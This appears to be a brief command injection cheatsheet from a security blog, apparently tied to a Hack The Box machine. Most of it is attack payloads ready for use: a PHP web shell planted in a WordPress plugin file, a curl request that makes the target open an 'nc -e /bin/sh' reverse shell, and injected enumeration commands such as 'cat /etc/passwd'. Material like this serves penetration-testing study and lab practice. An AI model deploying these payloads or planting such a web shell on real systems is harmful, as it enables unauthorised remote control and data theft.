Command Injection cheatsheet
Command Injection cheatsheet
Command injection is a vulnerability that occurs when an application improperly passes user input to a system shell. Attackers can exploit this flaw to execute arbitrary commands on the target system. This often happens due to improper input validation in web applications, shell scripts, or system commands.
Alternative Command Injection
Replace vulnerable code with:
1
<?php echo system($_REQUEST['cmd']); ?>
Example usage:
1
wp-content/plugins/akismet/wrapper.php?cmd=whoami
Or via curl:
1
curl -X POST http://spectra.htb/pathtoaskismet/wrapper.php -d cmd="nc 127.0.0.1 1337 -e /bin/sh"
Linux Command Injection
Basic Enumeration
1
2
3
4
5
6
7
; id
; whoami
; uname -a
; ls -la
; cat /etc/passwd
; ps aux
; netstat -tulnp
Chaining Commands
1
2
3
id; ls -la # Execute id and then list files
whoami && hostname # Run hostname only if whoami succeeds
ls || echo "Command failed" # Show message if ls fails
This post is licensed under CC BY 4.0 by the author.